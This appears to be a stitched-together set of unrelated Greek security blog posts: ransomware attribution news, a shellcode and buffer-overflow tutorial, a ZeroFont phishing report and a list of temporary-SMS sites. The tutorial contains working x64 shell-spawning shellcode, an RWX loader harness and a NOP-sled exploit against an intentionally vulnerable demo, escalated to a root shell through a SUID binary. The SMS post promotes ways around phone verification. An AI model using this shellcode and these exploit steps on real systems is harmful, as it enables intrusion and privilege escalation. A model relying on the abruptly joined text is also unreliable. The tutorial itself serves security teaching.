Με βάση τα ευρήματά τους, οι ερευνητές πιστεύουν ότι ο δράστης της απειλής θα μπορούσε να είναι ένας αρχικός διαμεσολαβητής πρόσβασης (IAB), αν και τα στοιχεία δείχνουν ότι το ShadowSyndicate είναι συνεργάτης σε πολλαπλές επιχειρήσεις ransomware.
Οι ερευνητές βασίζουν τα συμπεράσματά τους σε ένα ξεχωριστό δακτυλικό αποτύπωμα SSH που ανακάλυψαν σε 85 διακομιστές IP, οι περισσότεροι από τους οποίους χαρακτηρίζονται ως μηχανές εντολών και ελέγχου Cobalt Strike.
Οι αναλυτές είδαν για πρώτη φορά το fingerprint στις 16 Ιουλίου 2022 και εξακολουθούσε να χρησιμοποιείται τον Αύγουστο του 2023.
ShadowSyndicate arsenal
Η ομάδα ερευνητών βασίστηκε σε διάφορα εργαλεία για την έρευνά της, τα οποία περιλάμβαναν μηχανές εντοπισμού όπως οι Shodan και Censys, μαζί με διάφορες τεχνικές OSINT. Αυτό τους επέτρεψε να ανακαλύψουν ένα εκτεταμένο αποτύπωμα δραστηριότητας του ShadowSyndicate.
Εξετάζοντας τους διακομιστές ShadowSyndicate που εντοπίστηκαν με βάση το αποτύπωμα SSH, οι ερευνητές “έπεσαν πάνω σε οκτώ διαφορετικά υδατογραφήματα [κλειδιά άδειας χρήσης] της Cobalt Strike”.
Οι οκτώ διακομιστές Cobalt Strike επικοινωνούσαν με τα ransomware Cactus, Royal, Quantum, Nokoyawa, Play, Clop και BlackCat/ALPHV που αναπτύχθηκαν σε διάφορα δίκτυα θυμάτων.
Οι ερευνητές ανακάλυψαν επίσης διαμορφώσεις του Cobalt Strike που αναπτύχθηκαν σε δύο διακομιστές, αλλά μόνο ο ένας από αυτούς σε ένα μηχάνημα που διέθετε το αποτύπωμα SSH του ShadowSyndicate.
Σε ορισμένες επιθέσεις, το ShadowSyndicate χρησιμοποίησε το εργαλείο διείσδυσης Sliver, το οποίο θεωρούνταν προηγουμένως ως πιθανός αντικαταστάτης του Cobalt Strike.
Άλλα εργαλεία που παρατηρήθηκαν σε επιθέσεις του ShadowSyndicate περιλαμβάνουν τον φορτωτή κακόβουλου λογισμικού IcedID, τον φορτωτή MaaS Matanbuchus και το ωφέλιμο φορτίο Meterpreter Metasploit.
Ανάλυση server
Οι αναλυτές εξέτασαν την υπόθεση ότι και οι 85 διακομιστές με το ίδιο δακτυλικό αποτύπωμα κλειδιού SSH που συνδέονται με το ShadowSyndicate συνδέονται με έναν ενιαίο πάροχο φιλοξενίας, αλλά βρήκαν 18 διαφορετικούς ιδιοκτήτες, 22 διαφορετικά ονόματα δικτύου και 13 διαφορετικές τοποθεσίες.
Η ανάλυση των παραμέτρων του Cobalt Strike C2, όπως η ημερομηνία ανίχνευσης, τα υδατογραφήματα ή οι ρυθμίσεις του χρόνου αναστολής λειτουργίας, βοήθησε στην παραγωγή αποδεικτικών στοιχείων υψηλής αξιοπιστίας που συνδέουν το ShadowSyndicate με τα ransomware Quantum, Nokoyawa και ALPHV/BlackCat.
Συγκεκριμένα, οι αναλυτές συνέδεσαν τους διακομιστές με μια επίθεση Quantum από τον Σεπτέμβριο του 2022, τρεις επιθέσεις Nokoyawa από το τέταρτο τρίμηνο του 2022 και τον Απρίλιο του 2023 και μια επίθεση ALPHV από τον Φεβρουάριο του 2023.
Η Group-IB και τα προαναφερθέντα συνεργαζόμενα μέρη βρήκαν πρόσθετα στοιχεία που συνδέουν το ShadowSyndicate με λιγότερη εμπιστοσύνη με τις επιχειρήσεις κακόβουλου λογισμικού Ryuk, Conti, Trickbot, Royal, Clop και Play.
Ειδικά για το Clop, η έκθεση της Group-IB αναφέρει ότι τουλάχιστον 12 διευθύνσεις IP που προηγουμένως συνδέονταν με τους διαβόητους χειριστές ransomware μεταφέρθηκαν στο ShadowSyndicate από τον Αύγουστο του 2022 και τώρα χρησιμοποιούνται για το Cobalt Strike.
Παρά τα πολλά ευρήματα που υποδηλώνουν μια πιθανή σύνδεση, μια άμεση σύνδεση υψηλής εμπιστοσύνης μεταξύ του ShadowSyndicate και του Clop παραμένει ασύλληπτη.
Οι εμπειρογνώμονες πληροφοριών της Group-IB καταλήγουν στο συμπέρασμα ότι η ShadowSyndicate είναι πιθανότατα μια θυγατρική εταιρεία που συνεργάζεται με διάφορες επιχειρήσεις ransomware-as-a-service (RaaS). Ωστόσο, απαιτούνται πρόσθετα στοιχεία για να υποστηριχθεί αυτή η θεωρία.
Παρ’ όλα αυτά, το έργο αυτό είναι ζωτικής σημασίας για τον εντοπισμό και την καταπολέμηση του εγκλήματος στον κυβερνοχώρο και, με αυτό το πνεύμα, η εταιρεία κυβερνοκατασκοπείας καλεί εξωτερικούς ερευνητές να συνεργαστούν ανοιχτά μαζί της και να βοηθήσουν στην αποκάλυψη των υπόλοιπων ασαφών τμημάτων.
Για λεπτομέρειες που θα μπορούσαν να βοηθήσουν τους αμυντικούς να εντοπίσουν και να αποδώσουν τη δραστηριότητα του ShadowSyndicate, η Group-IB δημοσίευσε σήμερα μια έκθεση με τεχνικά δεδομένα από την έρευνά της.
In hacking, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called “shellcode” because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode. Shellcode is commonly written in machine code. (Wikipedia)
Το Shellcode είναι ένας τύπος ByteCode, δηλαδή ένας πηγαίος κώδικας σε καθαρό κώδικα μηχανής!
Στην πραγματικότητα, ένα shellcode είναι ένα bytecode που εκτελεί ένα κέλυφος εντολών: Ένα “περιβάλλον” στο οποίο μπορώ να εκτελέσω εντολές συστήματος.
Για να μπορέσετε να δημιουργήσετε έναν λειτουργικό Shellcode έχετε (κυρίως) δύο επιλογές:
Δημιουργήστε ένα πρόγραμμα σε Assembly, μεταγλωττίστε το και χρησιμοποιήστε τον εκτελέσιμο κώδικα που δημιούργησε ή
Κάντε το ίδιο με ένα πρόγραμμα C ή C++.
Ας ακολουθήσουμε την πιο βασική μέθοδο: να δημιουργήσουμε ένα shellcode μέσω της γλώσσας Assembly.
Υπάρχουν πολλοί διαθέσιμοι κώδικες shell, στο διαδίκτυο. Ένα πολύ γνωστό μέρος είναι εδώ: https://www.exploit-db.com/
Παρακάτω έχω ένα shellcode που θα δημιουργήσει ένα Bash Shell στη γλώσσα assembly:
;
;
; Source: https://www.exploit-db.com/exploits/47008
;
; Compile: nasm -felf64 spawn_shell.nasm -o spawn_shell.o
; Link: ld spawn_shell.o -o spawn_shell
;-----------------------------------------------------------
;
global _start
section .text
_start:
;int execve(const char *filename, char *const argv[],char *const envp[])
xor rsi, rsi ;clear rsi
push rsi ;push null on the stack
mov rdi, 0x68732f2f6e69622f ;/bin//sh in reverse order
push rdi
push rsp
pop rdi ;stack pointer to /bin//sh
mov al, 59 ;sys_execve
cdq ;sign extend of eax
syscall
Δημιουργώ ένα πολύ απλό bash script για να μεταγλωττίσω το πρόγραμμα και να εμφανίσω τον αντίστοιχο κώδικα byte:
Αυτό που μένει τώρα είναι να κάνω compile το Assembly πρόγραμμα:
Ο bytecode (ή ο κώδικας μηχανής) παραπάνω αντιπροσωπεύεται ως μια σειρά δεκαεξαδικών αριθμών, και είναι στην πραγματικότητα μια σειρά από bytes.Η μόνη εργασία που απομένει να κάνω τώρα είναι να πάρω αυτόν τον bytecode και να τον βάλω σε μια συμβολοσειρά ως εξής:
Σημειώστε την δεκαεξαδική μορφή εδώ. Σας θυμίζει κάτι από το Μέρος ΙI (η προσέγγιση ROP) 😎
Η βασική ιδέα εδώ είναι η εξής: Θέλουμε να βάλουμε αυτόν τον bytecode στη μνήμη και να τον εκτελέσουμε σαν ένα πρόγραμμα.
Χρήσιμες Σημειώσεις:
Υπάρχουν διαφορετικά bytecodes και συγκεκριμένα shell-codes για αρχιτεκτονικές 64 bit και 32 bit.
Ένα shell-code που εκτελείται σωστά σε σύστημα 32 bit δεν μπορεί να εκτελεστεί σε σύστημα 64 bit.
Για να μπορέσουμε να εκτελέσουμε έναν bytecode που βρίσκεται στη στοίβα (Stack), πρέπει να ενεργοποιήσουμε τη δυνατότητα του συστήματος να επιτρέπει την εκτέλεση κώδικα σε μη εκτελέσιμη θέση μνήμης.Αυτό μπορεί να γίνει (για παράδειγμα) χρησιμοποιώντας τη flag execstack -z στον μεταγλωττιστή gcc.
Ένα shellcode που εκτελείται σε ένα σύστημα (για παράδειγμα σε ένα CentOS x64) δεν είναι 100% εγγυημένο ότι θα μπορεί να εκτελεστεί σωστά σε ένα άλλο σύστημα με την ίδια αρχιτεκτονική, για παράδειγμα σε ένα κουτί Ubuntux64.
Μια ερώτηση που κάνουν πολλοί είναι: Πώς να δοκιμάσω τον shellcode μου;
Χμ… Λοιπόν, έχω δυο μεθόδους για να δοκιμάσω τα shell-codes μου και θα παρέχω και τις δύο σε αυτό το άρθρο.
Testing a shellcode – method I
Ο παρακάτω κώδικας σε C, μπορεί να χρησιμοποιηθεί και ως template για την φύλαξη του shellcode μέσα σε μια συμβολοσειρά (string) και τη δυνατότητα δοκιμής του.Το πρόγραμμα δημιουργεί ένα buffer με τον shellcode και του αποδίδει δικαιώματα RWX χρησιμοποιώντας το mprotect().
/**********************************************************************
*
* Program: tester64.xss.org.c
*
* Initial Date: 08/06/2021
* Mod my Geometry: change to work on 64bit (10/04/2023)
*
* Initial Author: Travis Phillips
*
* Purpose: This code is used to provide a C template to paste shellcode
* into and be able to run it live from within an ELF x64 binary's
* char buffer. This allows you to create a buffer with the
* shellcode globally and this program will mark it as RWX using
* mprotect() and then finally jump into.
*
* Compile: gcc -m64 tester64xss.org.c -o tester64.xss.org
*
***********************************************************************/#include<stdio.h>#include<unistd.h>#include<sys/mman.h>#include<string.h>/////////////////////////////////////////////////////// source file: execve(/bin/sh)/////////////////////////////////////////////////////char payload[]="\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05";intmain(){// Print the banner.puts("\n\033[33;1m---===[ Shellcode Tester x64 Stub v1.1 ]===---\033[0m\n");// Print the size of the shellcode.printf(" [\033[34;1m*\033[0m] Shellcode Size: %d\n",sizeof(payload)-1);// Create a function pointer to the shellcode and// display it to the user.void(*payload_ptr)()=(void(*)())&payload;printf(" [\033[34;1m*\033[0m] Shellcode Address: 0x%08x\n", payload_ptr);// Calculate the address to the start of the page for the// the shellcode.void*page_offset =(void*)((long)payload_ptr &~(getpagesize()-1));printf(" [\033[34;1m*\033[0m] Shellcode page: 0x%08x\n", page_offset);// Use mprotect to mark that page as RWX.mprotect(page_offset,4096, PROT_READ|PROT_WRITE|PROT_EXEC);// Finally, use our function pointer to jump into our payload.puts("\n\033[33;1m---------[ Begin Shellcode Execution ]---------\033[0m");payload_ptr();// We likely won't get here, but might as well include it just in case.puts("\033[33;1m---------[ End Shellcode Execution ]---------\033[0m");return0;}
Όπως μπορείτε να δείτε στα σχόλια, δεν χρησιμοποιούμε το -z execstack στη μεταγλώττιση επειδή αναγκάζουμε το πρόγραμμα να θεωρήσει τη μνήμη ως RWX (Read Write Execute) χρησιμοποιώντας το mprotect().Η εκτέλεση και η δοκιμή είναι η ακόλουθη:
Χρήσιμες Σημειώσεις:
Δεν μπορείτε να χρησιμοποιήσετε το παραπάνω πρόγραμμα για να δοκιμάσετε shell-codes 32 bit.
ΑΛΛΑ, είναι πολύ εύκολο να αλλάξετε το πρόγραμμα για δοκιμή shellcode 32 bit: Χρειάζεται μόνο να αλλάξετε τη γραμμή 47 από: void *page_offset = (void *)((long)payload_ptr & ~(getpagesize()-1));
σε: void *page_offset = (void *)(int)payload_ptr & ~(getpagesize()-1));
Το shell-code δεν πρέπει να περιέχει το byte “00” γιατί το πρόγραμμα θα το θεωρήσει ως συνθήκη τερματισμού και θα σταματήσει την εκτέλεσή του. Αυτή η δυνατότητα προκαλεί έναν από τους περισσότερους πονοκεφάλους κατά τη δημιουργία shell-codes. Υπάρχουν πολλές μέθοδοι που μπορούμε να χρησιμοποιήσουμε για να αποφύγουμε τα “00” bytes (όπως το XORing), αλλά αυτό είναι κάτι που ξεφεύγει από το στόχο του τρέχοντος άρθρου.
Testing a shellcode – method II
Αυτή είναι μια πολύ κοινή μέθοδος που χρησιμοποιούν σχεδόν όλοι οι (κανονικοί;;) άνθρωποι για να δοκιμάσουν τα shell-codes τους…Είναι πολύ πιο απλή και απαιτεί να ορίσετε ορισμένες flags κατά την μεταγλώττισης (που ήδη είδαμε στο Μέρος ΙΙ αυτής της σειράς).Αυτός είναι ο κώδικας σε C:
Πιο απλό και σχεδόν μια γραμμή κώδικα, ε;Αυτή είναι και η άγρια ομορφιά της C. 😈
Και πάλι, η δοκιμή είναι εύκολη:
ShellCodes on buffer overflow
Εξετάστε το παρακάτω πρόγραμμα επίδειξης σε C που χρησιμοποιήσαμε στο μέρος IΙ αυτής της σειράς. Βάζω εδώ (για λόγους σαφήνειας) ολόκληρο τον πηγαίο κώδικα:
// demo.c//// Compile: gcc -m64 -g -fno-stack-protector -z execstack -o demo demo.c//#include<stdio.h>#include<string.h>intcheckProductKey(char*userKey){char key[64];strcpy(key, userKey);int n =(strcmp(userKey,"123-456")==0);return n;}intmain(int argc,char* argv[]){char key[255];if(argc !=2){printf("Enter product key >");scanf("%s",key);}elsestrcpy(key, argv[1]);int iAllow =checkProductKey(key);if(!iAllow){printf("Wrong key!\n");return-1;}printf("Welcome to the DEMO SA Application.\n");printf("(c) 2023 all rights reserved.\n");return0;}
Χρησιμοποιώντας τη μέθοδο που περιγράφεται στο Μέρος ΙI, μπορούμε εύκολα να βρούμε τη διεύθυνση RET και το exploit για να ανακατευθύνουμε το πρόγραμμα και να παρακάμψουμε τους ελέγχους ProductKey:
Όπως παρατηρείτε, το μεταβλητό κλειδί της συνάρτησης checkProductKey έχει μήκος 64 byte.Ο στόχος μας είναι να αντικαταστήσουμε ορισμένα “A” με τα byte του shellcode και να ανακατευθύνουμε το πρόγραμμα μέσα στο ίδιο το bufferI για να εκτελέσουμε το shellcode.Για να γίνει αυτό πιο εύκολα, θα αλλάξουμε τον τρόπο με τον οποίο προσθέτουμε τις τιμές των ορισμάτων από την γραμμή εντολών.Θα χρησιμοποιήσουμε ένα HexEditor για αυτό.Το Kali έχει δύο πολύ ωραίους HexEditor: το HexEdit και το HexEditor.Αλλά, φυσικά, μπορείτε να επιλέξετε όποιον άλλον hex-editor θέλετε να δουλέψετε.
Θα βάλω τα ορίσματα (που θα περάσω στο πρόγραμμά μου) σε ένα αρχείο θα τα επεξεργαστώ με τον hex-editor.
Στην αρχή τοποθετώ τα ορίσματα σε ένα αρχείο με το όνομα args, άρα δίνω την εντολή:
Τώρα το αρχείο args περιέχει τα ορίσματα και μπορώ να τα διαχειριστώ μέσω ενός hex editor εισάγοντας αυτήν την εντολή:
exeditor -b args
Σημειώστε ότι η flag -b μου επιτρέπει να κάνω αλλαγές (διαγραφή, εισαγωγές) όταν δουλεύω μέσα στο αντίστοιχο αρχείο:
Χμ… δεν είναι ακριβώς αυτό που θα ήθελα να δω. Ο τελευταίος χαρακτήρας “0A” είναι οι χαρακτήρες αλλαγής γραμμής που βάζει το σύστημα όταν κάνω την ανακατεύθυνση στο αρχείο args. Δεν το χρειάζομαι εδώ, οπότε θα το αφαιρέσω!
Αυτό είναι το σωστό αρχείο:
Τώρα μπορώ να ελέγξω αν το exploit μου εξακολουθεί να λειτουργεί περνώντας το αρχείο args ως παράμετρο γραμμής εντολών:
./demo $(cat args)
και ορίστε και το PoC (Proof of Concept) :
Λειτουργεί μια χαρά!
Τώρα, ας πάμε στο πρόγραμμα εντοπισμού σφαλμάτων (debugger) για να εξηγήσουμε μερικά πράγματα ακόμα:
Βάζουμε ένα σημείο διακοπής (break point) στη γραμμή 7, με την εντολή b 7 (όπως στο Μέρος II) και τρέχω το πρόγραμμα με την εντολή:r $(cat args)
Αυτό που βλέπω εδώ στο ΚΟΚΚΙΝΟ κουτάκι είναι το σημείο που βρίσκομαι: Η αντικατάσταση της προσθήκης RET με 0x555555555261 είναι αυτή που εκτελεί την ανακατεύθυνση (ROP).
Αυτό που βλέπω στο ΚΙΤΡΙΝΟ κουτάκι είναι το σημείο που θέλω να πάω: Θέλω να βάλω τον ShellCode μου κάπου μέσα στα “Α” και μετά να αλλάξω τη διεύθυνση RET να δείχνει προς αυτές τις διευθύνσεις (σε κίτρινο πλαίσιο).
Για να μεγιστοποιήσω την πιθανότητα για μια επιτυχημένη επίθεση θα χρησιμοποιήσω ένα επιπλέον κόλπο: θα αντικαταστήσω τα “Α” με την εντολή NOP.
Ένα NOP (δεκαεξαδικό 0x90) είναι μια οδηγία για να πείτε στο σύστημα να μην κάνει τίποτα, και κατά συνέπεια να μεταβεί στην επόμενη εντολή!
Έτσι, σε περίπτωση που η διεύθυνση RET δεν δείχνει ακριβώς τη διεύθυνση έναρξης του shellcode, αλλά ίσως μερικές διευθύνσεις πριν, αλλά με την χρήση των 0x90, ο shellcode μου θα εκτελεστεί τελικά (ελπίζω).
Ας δούμε πρώτα αν το exploit μου λειτουργεί αν αντικαταστήσω το “A” με το “90”.:
… Επιτυχία!
Τώρα θα προσπαθήσουμε να βάλω το shell-code μου (αυτό που δημιούργησα στην προηγούμενη παράγραφο) εδώ μέσα:Εάν διαγράψω τα “\x” από τον κώδικα του shell μου “\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05″
Θα έχω αυτό:
4831f65648bf2f62696e2f2f736857545fb03b990f05
Τώρα, πρέπει να το βάλω αυτό στην κατάλληλη θέση μέσα στο αρχείο args και στη συνέχεια να αλλάξω τη διεύθυνση RET προς μια διεύθυνση πριν από τον shellcode αλλά μέσα στο buffer των “90” (δείτε το Κίτρινο Πλαίσιο στην δεύτερη παραπάνω εικόνα).
Δείτε λοιπόν την εκτέλεση στην παρακάτω εικόνα. Πράγματι, πήρα shell-access!
Όπως μπορείτε να δείτε, έλαβα ένα shell εισάγοντας το shellcode μου στο αρχείο args και αλλάζοντας τη διεύθυνση RET στο σύνολο των πιθανών διευθύνσεων που βρήκα από τον debugger.
Σημειώστε ότι οι διευθύνσεις που βρίσκονται στο STACK που πήρα από τον debugger δεν είναι εγγυημένο ότι θα είναι ακριβώς οι ίδιες με αυτές που έχω όταν εκτελώ το πρόγραμμα κατευθείαν από τη γραμμή εντολών (και όχι μέσα από τον debugger). Σε τέτοιες περιπτώσεις πρέπει να αλλάξω λίγο τη διεύθυνση RET μέχρι να εκτελεστεί το shell.
Got root?
Μέχρι στιγμής έχουμε ένα shell με δικαιώματα χρήστη.Αλλά αυτός δεν είναι ο τελικός μας στόχος, καθώς ο κύριος σκοπός μας (συνήθως) είναι να αποκτήσουμε root… ή να αποκτήσουμε ένα shell με δικαιώματα root.
Το ερώτημα τώρα είναι: είναι αυτό δυνατό;Λοιπόν, η απάντηση είναι ΝΑΙ, αλλά υπό ορισμένες προϋποθέσεις.
Μια τέτοια προϋπόθεση είναι όταν εκτελούμε ένα πρόγραμμα SUID. SUID: σημαίνει Set owner User ID.Αυτή είναι μια ειδική άδεια σε συστήματα με λειτουργικό LINUX, που ισχύει για scripts ή εφαρμογές.Εάν έχει οριστεί το bit SUID, όταν εκτελείται το πρόγραμμα, τότε το UID είναι κατόχου του αρχείου (που είναι ο root), αντί του χρήστη που το εκτελεί.
Υπάρχουν ορισμένες περιπτώσεις που ο χρήστης root δίνει άδεια SUID σε μια εφαρμογή λόγω συγκεκριμένων προνομίων που απαιτεί.Επιπλέον, ορισμένα προνόμια χαμηλότερου επιπέδου μπορούν να εκτελέσουν ένα πρόγραμμα SUID χωρίς να χρειάζεται να κατέχουν δικαιώματα root.
Η ευπάθεια προκύπτει από μια τέτοια κατάσταση είναι όταν το πρόγραμμα SUID έχει μια ευπάθεια buffer overflow τότε μπορεί να επιτρέπει στον απλό χρήστη να εκτελέσει μια εντολή με τα δικαιώματα SUID…Έτσι, μπορείτε να φανταστείτε τι θα γίνει αν το μικρό μας πρόγραμμα επίδειξης είχε SUID priv/s;Ας το δούμε αυτό στην πραγματικότητα.
Πρώτα απ ‘όλα κάνουμε το demo εκτελέσιμο SUID, ως εξής:
Έτσι, ανοίξτε μια κονσόλα root, αλλάξτε το Group και τον Owner του προγράμματος σε root και μετά αλλάξτε το Mode σε 4777.
Τώρα το πρόγραμμα επίδειξης μας, μοιάζει με αυτό:
Σύμφωνα με τη λογική SUID που εξηγήσαμε παραπάνω, αν εκτελέσουμε το shell μας μέσα στο address-space του demo, θα πρέπει να επιστρέψει ένα root shell!
Λοιπόν, ας το δοκιμάσουμε:
Ωπ!!! 😳 😳 Όχι!!!Δεν δουλεύει… 👿 🙁
Έχω πάρει shell αλλά με user priv/s!!Μα γιατί??
Λοιπόν, υπάρχει λόγος για αυτό: Many popular implementations of linux sh drop privileges when they start up: They reset their effective UID to their real UID. This includes ‘bash’, ‘dash’, ‘mksh’ and ‘BusyBox’ sh, so on Linux you won’t see anything else…
…επομένως στο Linux δεν θα παίξει…. Χμμμμ, μπορούμε να κάνουμε κάτι για αυτό; Και φυσικά η απάντηση (ως συνήθως) είναι: ΝΑΙ! Μπορούμε να δημιουργήσουμε έναν shell-code σε assembly που ορίζει το UID σε μηδέν (0) (γνωστός και ως ρίζα – root) και στη συνέχεια να καλεί το shell.
Για να γίνει πιο συγκεκριμένο τεχνικά, δείτε αυτό:
Για να βεβαιωθώ ότι θα λειτουργήσει στο δικό μου Kali, το δοκιμάζω με τον πρόγραμμα που παρουσίασα στην παράγραφο “Shellcodes” και επαλήθευσα ότι όντως επιστρέφει ένα shell.
Λάβετε υπόψη ότι πρέπει να δοκιμάσετε όλους τους κώδικες shell πριν τους εκτελέσετε για να ελέγξετε αν λειτουργούν στο σύστημα σας.Σημειώστε επίσης ότι υπάρχουν περιπτώσεις που ακόμη και οι κώδικες shell δεν λειτουργούν όταν μεταβιβάζονται στo Stack.Ξέρετε, όπως είπαμε στο Μέρος ΙI, μερικές φορές τα αποτελέσματα δεν είναι ντετερμινιστικά.
Τέλος πάντων, ας δοκιμάσουμε αυτό το νέο shellcode με το δοκιμαστικό μας πρόγραμμα.Η πρώτη ερώτηση είναι: Χωράει στο buffer; Λοιπόν, ο παραπάνω shellcode είναι 48 bytes και το buffer μας (η βασική μεταβλητή) είναι 64 bytes, οπότε η απάντηση είναι ΝΑΙ.Εντάξει ας το κάνουμε!Τροποποιήστε το αρχείο args και εκτελέστε το…
OOooo YES!
Got Root!
Και τώρα, τί;
Τι θα λέγατε να φτιάξουμε ένα Μέρος IV σχετικά με ένα αντίστοιχο παράδειγμα στα Windows 11 64 bit;Ενδιαφέρεσαι ακόμη?Αν ναι, stay tuned… for the next part!
Το ZeroFont phishing ξεγελάει το Outlook και δείχνει ψεύτικες AV σαρώσεις
Οι χάκερς χρησιμοποιούν ένα νέο τέχνασμα, χρησιμοποιώντας γραμματοσειρές μηδενικού σημείου στα μηνύματα ηλεκτρονικού ταχυδρομείου, για να κάνουν τα κακόβουλα μηνύματα ηλεκτρονικού ταχυδρομείου να φαίνονται ότι σαρώνονται με ασφάλεια από τα εργαλεία ασφαλείας του Microsoft Outlook.
Αν και η τεχνική ZeroFont phishing έχει χρησιμοποιηθεί στο παρελθόν, είναι η πρώτη φορά που τεκμηριώνεται ότι χρησιμοποιείται με αυτόν τον τρόπο.
Σε μια νέα έκθεση του αναλυτή της ISC Sans, Jan Kopriva, ο ερευνητής προειδοποιεί ότι αυτό το τέχνασμα θα μπορούσε να κάνει τεράστια διαφορά στην αποτελεσματικότητα των επιχειρήσεων phishing και οι χρήστες θα πρέπει να γνωρίζουν την ύπαρξή της.
Επιθέσεις ZeroFont
Η μέθοδος επίθεσης ZeroFont, η οποία καταγράφηκε για πρώτη φορά από την Avanan το 2018, είναι μια τεχνική phishing που εκμεταλλεύεται ελαττώματα στον τρόπο με τον οποίο τα συστήματα επεξεργασίας τεχνητής νοημοσύνης και φυσικής γλώσσας (NLP) στις πλατφόρμες ασφαλείας ηλεκτρονικού ταχυδρομείου αναλύουν το κείμενο.
Περιλαμβάνει την εισαγωγή κρυμμένων λέξεων ή χαρακτήρων σε μηνύματα ηλεκτρονικού ταχυδρομείου, θέτοντας το μέγεθος της γραμματοσειράς στο μηδέν, καθιστώντας το κείμενο αόρατο για τους ανθρώπινους στόχους, αλλά διατηρώντας το αναγνώσιμο από τους αλγόριθμους NLP.
Η επίθεση αυτή αποσκοπεί στην αποφυγή των φίλτρων ασφαλείας με την εισαγωγή αόρατων καλοήθων όρων που αναμειγνύονται με ύποπτο ορατό περιεχόμενο, διαστρεβλώνοντας την ερμηνεία του περιεχομένου από την τεχνητή νοημοσύνη και το αποτέλεσμα των ελέγχων ασφαλείας.
Στην έκθεσή της για το 2018, η Avanan προειδοποίησε ότι το ZeroFont παρέκαμψε την προηγμένη προστασία από απειλές (ATP) του Office 365 της Microsoft, ακόμη και όταν τα μηνύματα ηλεκτρονικού ταχυδρομείου περιείχαν γνωστές κακόβουλες λέξεις-κλειδιά.
Απόκρυψη ψευδών σαρώσεων antivirus
Σε ένα νέο phishing email που είδε η Kopriva, ένας απειλητικός παράγοντας χρησιμοποιεί την επίθεση ZeroFont για να χειραγωγήσει τις προεπισκοπήσεις μηνυμάτων σε ευρέως χρησιμοποιούμενα προγράμματα ηλεκτρονικού ταχυδρομείου, όπως το Microsoft Outlook.
Συγκεκριμένα, το εν λόγω μήνυμα ηλεκτρονικού ταχυδρομείου εμφάνιζε ένα διαφορετικό μήνυμα στη λίστα email του Outlook από ό,τι στο παράθυρο προεπισκόπησης.
Όπως μπορείτε να δείτε παρακάτω, στο παράθυρο της λίστας email αναγράφεται “Scanned and secured by Isc®Advanced Threat protection (APT): 9/22/2023T6:42 AM,” ενώ η αρχή του email στο παράθυρο προεπισκόπησης/ανάγνωσης εμφανίζει “Job Offer | Employment Opportunity”.
Αυτή η ασυμφωνία επιτυγχάνεται με την αξιοποίηση του ZeroFont για την απόκρυψη του ψεύτικου μηνύματος σάρωσης ασφαλείας στην αρχή του ηλεκτρονικού μηνύματος phishing, έτσι ώστε ενώ δεν είναι ορατό στον παραλήπτη, το Outlook εξακολουθεί να το αρπάζει και να το εμφανίζει ως προεπισκόπηση στο παράθυρο καταχώρισης μηνυμάτων ηλεκτρονικού ταχυδρομείου.
Ο στόχος είναι να ενσταλάξουν στον παραλήπτη μια ψευδή αίσθηση νομιμότητας και ασφάλειας.
Παρουσιάζοντας ένα παραπλανητικό μήνυμα σάρωσης ασφαλείας, αυξάνεται η πιθανότητα ο στόχος να ανοίξει το μήνυμα και να ασχοληθεί με το περιεχόμενό του.
Είναι πιθανό ότι το Outlook δεν είναι το μόνο πρόγραμμα-πελάτης ηλεκτρονικού ταχυδρομείου που αρπάζει το πρώτο τμήμα ενός μηνύματος ηλεκτρονικού ταχυδρομείου για προεπισκόπηση ενός μηνύματος χωρίς να ελέγχει αν το μέγεθος της γραμματοσειράς του είναι έγκυρο, οπότε συνιστάται επαγρύπνηση και για τους χρήστες άλλου λογισμικού.
Δωρεάν Verification χωρίς πραγματικό αριθμό τηλεφώνου.
Πιστεύω όλοι έχουμε πάει να κάνουμε ηλεκτρονικές αγορές, ή να φτιάξουμε λογαριασμός στα Social Media σωστά;
Πιστεύω όλοι έχουμε δει αυτό την επιλογή που λέει να προσθέσουμε τον αριθμό κινητού μας έτσι ώστε να μας στείλουν έναν κωδικό επιβεβαιώσεις σωστά;
Πάρα πολλά άτομα ξενερώνουν με την Ανωνυμία επειδή αναγκάζονται να προσθέσουν τα προσωπικά τους στοιχεία ( όπως τον αριθμό τους ).
Σήμερα θα σας δείξω έναν πολύ απλό τρόπο έτσι ώστε να κάνετε αγορές καθώς και λογαριασμούς χωρίς να προσθέτετε τα προσωπικά σας στοιχεία.
Temp-SMS
https://temp-sms.org/sms/642108797516
Αυτός ο ιστότοπος είναι πολύ παρόμοιος με το temp mail – sms, αλλά σε αυτόν τον ιστότοπο μπορείτε να πάρετε έναν αριθμό EN , υπάρχει όμως μια μικρή περίπτωση
μερική ιστότοποι να μην μπορούν να επιβεβαιώσουν τον αριθμό αυτόν οπότε πρέπει να δείτε και άλλους συνδέσμους.
7sim
https://7sim.org/free-phone-number-45MwGrzN
Αυτός ο ιστότοπος είναι ένας άλλος πολύ καλός ιστότοπος που έχω χρησιμοποιήσει και δίνει έναν πραγματικά περίεργο αριθμό όπως το 570, αλλά μπορείτε να πάρετε έναν αριθμό από το Ηνωμένο Βασίλειο ( παράδειγμα ) και να περάσετε από το yahoo και άλλους ιστότοπους με αυτό το ελεύθερο site ελέγχου sms.
http://freesmsverification.com/
k7.net – Αυτή η χρήση για δωρεάν Verifications δουλεύει τέλεια σε όλα τα site για οποιαδήποτε χώρα!
Το site αυτό έχει κατασκευαστή για να σας δώσει έναν αριθμό που ήταν σαν έναν πραγματικό αριθμό τηλεφώνου και ήταν glitchy δεδομένου ότι δεν προσφέρουν sms, αλλά θα μπορούσατε να χρησιμοποιήσετε τη φωνητική επαλήθευση επειδή με την επιβεβαίωση του αριθμού αμέσως θα πάρετε ένα φωνητικό μήνυμα και θα λάβετε τους κωδικούς επαλήθευσης σας δυστυχώς, ξεκίνησαν αυτό το site αντιμετωπίζει μερικές φορές θέματα όταν πηγαίνετε στο k7 και προσπαθήστε να πάρετε έναν αριθμό, αν το κάνετε αυτό και σας βγάλει κάποιο σφάλμα, απλά θα σας ανακατευθύνει σε εκεί νέο site που προσφέρει μόνο 800 αριθμούς.
Οι 800 αριθμοί ενδέχεται να μην δουλεύουν σχεδόν καθόλου για την επαλήθευση.
